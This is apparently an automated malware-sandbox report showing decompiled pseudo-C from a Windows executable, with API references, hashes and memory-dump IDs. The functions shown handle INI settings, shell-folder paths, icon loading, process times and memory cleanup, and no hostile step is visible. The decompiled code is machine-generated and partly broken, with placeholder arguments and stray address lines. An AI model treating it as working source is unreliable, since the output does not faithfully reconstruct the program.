                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCloseFolderLibraryLoadOpenPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$c:@
                                                                                                                                                      • API String ID: 2249099915-3068728944
                                                                                                                                                      • Opcode ID: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
                                                                                                                                                      • Instruction ID: c666c52b0d5343781dad8f8333b9175691e3d2dec84d7c30fbf64d54c1d05659
                                                                                                                                                      • Opcode Fuzzy Hash: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
                                                                                                                                                      • Instruction Fuzzy Hash: FE01D671905214AED720BB95AD4AEEF777CDF84304F2000BAF909B10D2EA745E88DA69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E0040BB15(void* __eflags) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr* _t35;
                                                                                                                                                      				intOrPtr _t37;
                                                                                                                                                      				intOrPtr _t38;
                                                                                                                                                      				struct HICON__* _t42;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				intOrPtr* _t50;
                                                                                                                                                      				intOrPtr* _t57;
                                                                                                                                                      				intOrPtr* _t59;
                                                                                                                                                      				void* _t60;
                                                                                                                                                      
                                                                                                                                                      				_t59 =  *((intOrPtr*)(_t60 + 0xc));
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x208)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x244)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x274)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x240)) = 0;
                                                                                                                                                      				 *_t59 = 0x410438;
                                                                                                                                                      				_t35 = _t59 + 0x6ac;
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x694)) = 0;
                                                                                                                                                      				_t50 = _t59 + 0x6c4;
                                                                                                                                                      				 *((intOrPtr*)(_t35 + 0xc)) = 0;
                                                                                                                                                      				 *_t35 = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t35 + 4)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t35 + 0x10)) = 0x100;
                                                                                                                                                      				 *((intOrPtr*)(_t35 + 8)) = 0;
                                                                                                                                                      				E0040133A(_t50);
                                                                                                                                                      				 *_t50 = 0x40f7b8;
                                                                                                                                                      				_t37 = E0040167A(_t50 + 0x40);
                                                                                                                                                      				 *((short*)(_t50 + 0x80)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t50 + 0x2080)) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t50 + 0x2084)) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t50 + 0x2088)) = 1;
                                                                                                                                                      				_push(0x2238);
                                                                                                                                                      				 *((intOrPtr*)(_t50 + 4)) = 0x72;
                                                                                                                                                      				 *((intOrPtr*)(_t50 + 0x74)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t50 + 0x78)) = 0;
                                                                                                                                                      				L0040E038(); // executed
                                                                                                                                                      				if(_t37 == 0) {
                                                                                                                                                      					_t37 = 0;
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *((intOrPtr*)(_t37 + 0x14)) = 1;
                                                                                                                                                      					 *((short*)(_t37 + 0x18)) = 0;
                                                                                                                                                      					 *((short*)(_t37 + 0x228)) = 0;
                                                                                                                                                      					 *((intOrPtr*)(_t37 + 0x2228)) = 1;
                                                                                                                                                      					 *((intOrPtr*)(_t37 + 0x222c)) = 1;
                                                                                                                                                      					 *((intOrPtr*)(_t37 + 0x2230)) = 1;
                                                                                                                                                      					 *0x412b14 = _t37;
                                                                                                                                                      				}
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x698)) = _t37;
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				_t63 = _t37;
                                                                                                                                                      				_t48 = 0xc00;
                                                                                                                                                      				if(_t37 == 0) {
                                                                                                                                                      					_t38 = 0;
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t38 = E0040219B(_t37, _t63);
                                                                                                                                                      				}
                                                                                                                                                      				_t57 = _t59 + 0x27c;
                                                                                                                                                      				 *_t57 = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x69c)) = _t38;
                                                                                                                                                      				E00401000(_t59 + 0x492, _t48, 0x412054);
                                                                                                                                                      				 *_t57 = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x284)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x280)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x278)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t59 + 0x6a0)) = 0;
                                                                                                                                                      				_t42 = LoadIconW(GetModuleHandleW(0), 0x65); // executed
                                                                                                                                                      				E00401879(_t59, _t42);
                                                                                                                                                      				return _t59;
                                                                                                                                                      			}
















                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040133A: memset.MSVCRT ref: 0040134C
                                                                                                                                                        • Part of subcall function 0040167A: memset.MSVCRT ref: 00401690
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040BBA5
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040BBE3
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00002238), ref: 0040BC31
                                                                                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0040BC3A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@memset$HandleIconLoadModule
                                                                                                                                                      • String ID: T A
                                                                                                                                                      • API String ID: 2596266805-11209434
                                                                                                                                                      • Opcode ID: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
                                                                                                                                                      • Instruction ID: b1f1b1f427025bd6f8a5dd4ebf1048772c532f9d5de5c5214c9bf7dacc49333d
                                                                                                                                                      • Opcode Fuzzy Hash: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
                                                                                                                                                      • Instruction Fuzzy Hash: 1F31ACB19013559FC720DF6989886CABBE8FF08300F11867FE84CDB261D7B89654CB98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 20%
                                                                                                                                                      			E0040D56B(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                                                                                      				signed short _v131076;
                                                                                                                                                      				long _t17;
                                                                                                                                                      
                                                                                                                                                      				_t25 = __esi;
                                                                                                                                                      				E0040E340(0x20000, __ecx);
                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                      					_t17 = GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24); // executed
                                                                                                                                                      					return _t17;
                                                                                                                                                      				} else {
                                                                                                                                                      					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                                                                                      						_push(_a24);
                                                                                                                                                      					} else {
                                                                                                                                                      						_v131076 = _v131076 & 0x00000000;
                                                                                                                                                      						_push(__esi);
                                                                                                                                                      						_push(L"\"%s\"");
                                                                                                                                                      						_push(0xfffe);
                                                                                                                                                      						_push( &_v131076);
                                                                                                                                                      						L0040DFD6();
                                                                                                                                                      						_push(_a24);
                                                                                                                                                      						_push( &_v131076);
                                                                                                                                                      					}
                                                                                                                                                      					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                                                                                      				}
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • wcschr.MSVCRT ref: 0040D585
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040D5AA
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D5C8
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 0040D5E0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                      • String ID: "%s"
                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                      • Opcode ID: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
                                                                                                                                                      • Instruction ID: 59b69a585cfc8d845437793ab3ce32260e68e2dddd06eaeef13322f749f2ab00
                                                                                                                                                      • Opcode Fuzzy Hash: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
                                                                                                                                                      • Instruction Fuzzy Hash: 3101783290421ABBEF219F919C06FDA3B6AAF04318F048035BE05601A2D7798525DBA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040CE3D(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                                                                                      				int _t8;
                                                                                                                                                      				struct HINSTANCE__* _t9;
                                                                                                                                                      
                                                                                                                                                      				if( *0x4136f4 == 0) {
                                                                                                                                                      					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                      					if(_t9 != 0) {
                                                                                                                                                      						 *0x4136f4 = 1;
                                                                                                                                                      						 *0x4136f8 = GetProcAddress(_t9, "GetProcessTimes");
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if( *0x4136f8 == 0) {
                                                                                                                                                      					return 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                                                                      					return _t8;
                                                                                                                                                      				}
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE4E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0040CE68
                                                                                                                                                      • GetProcessTimes.KERNELBASE(?,?,?,?,?,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE8B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                      • API String ID: 1714573020-3385500049
                                                                                                                                                      • Opcode ID: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
                                                                                                                                                      • Instruction ID: 9062282254ac126051856908680c029023e6c569a8a6eaee544e1b96dd2f004d
                                                                                                                                                      • Opcode Fuzzy Hash: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
                                                                                                                                                      • Instruction Fuzzy Hash: E7F03031141209FFDF218FA0ED45F963BA8AB14301F008176F92CA1AB0D77585A4DB9C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E004076F4(intOrPtr* __edi) {
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void** _t11;
                                                                                                                                                      				intOrPtr* _t18;
                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                      				void* _t28;
                                                                                                                                                      				intOrPtr _t31;
                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                      				intOrPtr* _t36;
                                                                                                                                                      
                                                                                                                                                      				_t27 = __edi;
                                                                                                                                                      				 *__edi = 0x410168;
                                                                                                                                                      				E0040768E(__edi);
                                                                                                                                                      				_t31 =  *((intOrPtr*)(__edi + 0x14));
                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                      					E00406355(_t31);
                                                                                                                                                      					_push(_t31);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				_t32 =  *((intOrPtr*)(_t27 + 0x10));
                                                                                                                                                      				if(_t32 != 0) {
                                                                                                                                                      					E00406355(_t32);
                                                                                                                                                      					_push(_t32);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				_t33 =  *((intOrPtr*)(_t27 + 0xc));
                                                                                                                                                      				if(_t33 != 0) {
                                                                                                                                                      					E00406355(_t33);
                                                                                                                                                      					_push(_t33);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				_t34 =  *((intOrPtr*)(_t27 + 8));
                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                      					E00406355(_t34);
                                                                                                                                                      					_push(_t34);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				_t18 = _t27;
                                                                                                                                                      				_pop(_t35);
                                                                                                                                                      				_push(_t27);
                                                                                                                                                      				_t36 = _t18;
                                                                                                                                                      				_t28 = 0;
                                                                                                                                                      				if( *((intOrPtr*)(_t36 + 4)) > 0 &&  *((intOrPtr*)(_t36 + 0x3c)) > 0) {
                                                                                                                                                      					do {
                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(E00407588(_t36, _t28))) + 0xc))();
                                                                                                                                                      						_t28 = _t28 + 1;
                                                                                                                                                      					} while (_t28 <  *((intOrPtr*)(_t36 + 0x3c)));
                                                                                                                                                      				}
                                                                                                                                                      				_t11 =  *((intOrPtr*)( *_t36))();
                                                                                                                                                      				free( *_t11); // executed
                                                                                                                                                      				return _t11;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040770F
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00407722
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00407735
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00407748
                                                                                                                                                      • free.MSVCRT(00000000), ref: 00407781
                                                                                                                                                        • Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,74784E00,?,00000000), ref: 0040635C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                      • Opcode ID: fed31934c8ca2d006947c88f4fde5997effb1b6458a607f602b4779a4b9fefa7
                                                                                                                                                      • Instruction ID: c8a6b3cb51e6e8f56dec58333c0ea0519a89c45fbe64381fe3d5b910dcd78a78
                                                                                                                                                      • Opcode Fuzzy Hash: fed31934c8ca2d006947c88f4fde5997effb1b6458a607f602b4779a4b9fefa7
                                                                                                                                                      • Instruction Fuzzy Hash: 9901C232E099305BC6257B3AD40191EB3A9AE80BA0316453FE905B73D1CB7C7C518ADE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E00401DCF(void* __ecx, signed int _a4, signed short* _a8) {
                                                                                                                                                      				signed int _t23;
                                                                                                                                                      				signed short* _t24;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      				signed short* _t32;
                                                                                                                                                      
                                                                                                                                                      				_t23 = _a4;
                                                                                                                                                      				_t32 = _a8;
                                                                                                                                                      				 *_t32 =  *_t32 & 0x00000000;
                                                                                                                                                      				_t27 = 0xa;
                                                                                                                                                      				if(_t23 > _t27) {
                                                                                                                                                      					L12:
                                                                                                                                                      					_t24 = _t32;
                                                                                                                                                      					L13:
                                                                                                                                                      					return _t24;
                                                                                                                                                      				}
                                                                                                                                                      				switch( *((intOrPtr*)(_t23 * 4 +  &M00401E73))) {
                                                                                                                                                      					case 0:
                                                                                                                                                      						__eax = __ecx + 0x38;
                                                                                                                                                      						goto L15;
                                                                                                                                                      					case 1:
                                                                                                                                                      						__eax = __ecx + 0x30;
                                                                                                                                                      						L15:
                                                                                                                                                      						__eax = E00401D90(__eax, __esi); // executed
                                                                                                                                                      						goto L12;
                                                                                                                                                      					case 2:
                                                                                                                                                      						__ecx =  *((intOrPtr*)(__ecx + 0x10));
                                                                                                                                                      						goto L18;
                                                                                                                                                      					case 3:
                                                                                                                                                      						__ecx =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                                                      						goto L18;
                                                                                                                                                      					case 4:
                                                                                                                                                      						__ecx =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                                                                      						goto L18;
                                                                                                                                                      					case 5:
                                                                                                                                                      						__ecx =  *((intOrPtr*)(__ecx + 0x1c));
                                                                                                                                                      						L18:
                                                                                                                                                      						__eax = 0x412320;
                                                                                                                                                      						goto L3;
                                                                                                                                                      					case 6:
                                                                                                                                                      						__eflags =  *(__ecx + 0x40) & 0x00000001;
                                                                                                                                                      						goto L6;
                                                                                                                                                      					case 7:
                                                                                                                                                      						__eflags =  *(__ecx + 0x40) & 0x00002000;
                                                                                                                                                      						goto L6;
                                                                                                                                                      					case 8:
                                                                                                                                                      						__eflags =  *(__ecx + 0x40) & 0x00004000;
                                                                                                                                                      						L6:
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							_push(9);
                                                                                                                                                      							_pop(__ebx);
                                                                                                                                                      						}
                                                                                                                                                      						__eax = E00406827(__ebx);
                                                                                                                                                      						goto L13;
                                                                                                                                                      					case 9:
                                                                                                                                                      						_push( *((intOrPtr*)(__ecx + 0x2c)));
                                                                                                                                                      						_push( *((intOrPtr*)(__ecx + 0x28)));
                                                                                                                                                      						_push(L"%I64d");
                                                                                                                                                      						_push(0xff);
                                                                                                                                                      						_push(__esi);
                                                                                                                                                      						L0040DFD6();
                                                                                                                                                      						__esp = __esp + 0x14;
                                                                                                                                                      						goto L12;
                                                                                                                                                      					case 0xa:
                                                                                                                                                      						_t30 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                                                      						L3:
                                                                                                                                                      						_t24 = E00406306(0x412340, _t30);
                                                                                                                                                      						if(_t24 == 0) {
                                                                                                                                                      							_t24 = 0x40f454;
                                                                                                                                                      						}
                                                                                                                                                      						goto L13;
                                                                                                                                                      				}
                                                                                                                                                      			}







                                                                                                                                                      0x00401e5d
                                                                                                                                                      0x00401e5d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e07
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e1f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e17
                                                                                                                                                      0x00401e0b
                                                                                                                                                      0x00401e0b
                                                                                                                                                      0x00401e0d
                                                                                                                                                      0x00401e0f
                                                                                                                                                      0x00401e0f
                                                                                                                                                      0x00401e10
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e27
                                                                                                                                                      0x00401e2a
                                                                                                                                                      0x00401e2d
                                                                                                                                                      0x00401e32
                                                                                                                                                      0x00401e37
                                                                                                                                                      0x00401e38
                                                                                                                                                      0x00401e3d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401def
                                                                                                                                                      0x00401df7
                                                                                                                                                      0x00401df7
                                                                                                                                                      0x00401dfe
                                                                                                                                                      0x00401e00
                                                                                                                                                      0x00401e00
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintf
                                                                                                                                                      • String ID: #A$%I64d$@#A
                                                                                                                                                      • API String ID: 3988819677-2754857024
                                                                                                                                                      • Opcode ID: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
                                                                                                                                                      • Instruction ID: 57e1b299ab2ee78cab24039c69e456b61a4fcaae797c094412e686c8a915beca
                                                                                                                                                      • Opcode Fuzzy Hash: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
                                                                                                                                                      • Instruction Fuzzy Hash: A811BF31204204D7D724AA54D841AA97369BB01358B3004BFFE16AE2E2D77AD953D3CE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040562D(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                                                                                      				void* _t8;
                                                                                                                                                      				void* _t13;
                                                                                                                                                      				signed int _t16;
                                                                                                                                                      				void** _t21;
                                                                                                                                                      				signed int _t22;
                                                                                                                                                      
                                                                                                                                                      				_t21 = __edi;
                                                                                                                                                      				_t22 =  *__eax;
                                                                                                                                                      				if(__edx < _t22) {
                                                                                                                                                      					return 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t13 =  *__edi;
                                                                                                                                                      					do {
                                                                                                                                                      						_t1 =  &_a8; // 0x40655f
                                                                                                                                                      						 *__eax =  *__eax +  *_t1;
                                                                                                                                                      						_t16 =  *__eax;
                                                                                                                                                      					} while (__edx >= _t16);
                                                                                                                                                      					_t8 = malloc(_t16 * _a4); // executed
                                                                                                                                                      					 *__edi = _t8;
                                                                                                                                                      					if(_t22 > 0) {
                                                                                                                                                      						if(_t8 != 0) {
                                                                                                                                                      							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                                                                      						}
                                                                                                                                                      						free(_t13); // executed
                                                                                                                                                      					}
                                                                                                                                                      					return 0 |  *_t21 != 0x00000000;
                                                                                                                                                      				}
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • malloc.MSVCRT ref: 00405649
                                                                                                                                                      • memcpy.MSVCRT ref: 00405661
                                                                                                                                                      • free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74784E00,?,00000000), ref: 0040566A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                      • String ID: _e@
                                                                                                                                                      • API String ID: 3056473165-4143410925
                                                                                                                                                      • Opcode ID: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
                                                                                                                                                      • Instruction ID: 65c1df984c8dd591618957182971b53504cae5b365517194d008c843f4823b23
                                                                                                                                                      • Opcode Fuzzy Hash: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
                                                                                                                                                      • Instruction Fuzzy Hash: 78F0E2B26052229FC718AB76B98184BB3ADEF443247504C3FF408E3281D7399C50CFA8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                      			E004061CD(FILETIME* __edi, signed int* __esi) {
                                                                                                                                                      				struct _SYSTEMTIME _v20;
                                                                                                                                                      				struct _SYSTEMTIME _v36;
                                                                                                                                                      				int _t12;
                                                                                                                                                      
                                                                                                                                                      				if(__edi->dwHighDateTime != 0) {
                                                                                                                                                      					FileTimeToSystemTime(__edi,  &_v20);
                                                                                                                                                      					_t12 = SystemTimeToTzSpecificLocalTime(0,  &_v20,  &_v36); // executed
                                                                                                                                                      					_push(__esi);
                                                                                                                                                      					if(_t12 == 0) {
                                                                                                                                                      						return FileTimeToLocalFileTime(__edi, ??);
                                                                                                                                                      					} else {
                                                                                                                                                      						SystemTimeToFileTime( &_v36, ??);
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					 *__esi =  *__esi & 0x00000000;
                                                                                                                                                      					__esi[1] = __esi[1] & 0x00000000;
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,00401DAD), ref: 004061E9
                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,00401DAD), ref: 004061F9
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00401DAD), ref: 00406208
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 979780441-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                      			E0040E490() {
                                                                                                                                                      				intOrPtr _t1;
                                                                                                                                                      				intOrPtr _t2;
                                                                                                                                                      				intOrPtr _t3;
                                                                                                                                                      				intOrPtr _t4;
                                                                                                                                                      
                                                                                                                                                      				_t1 =  *0x413270; // 0x2150048
                                                                                                                                                      				if(_t1 != 0) {
                                                                                                                                                      					_push(_t1); // executed
                                                                                                                                                      					L0040E032(); // executed
                                                                                                                                                      				}
                                                                                                                                                      				_t2 =  *0x413278; // 0x9a7120
                                                                                                                                                      				if(_t2 != 0) {
                                                                                                                                                      					_push(_t2);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				_t3 =  *0x413274; // 0x9a7930
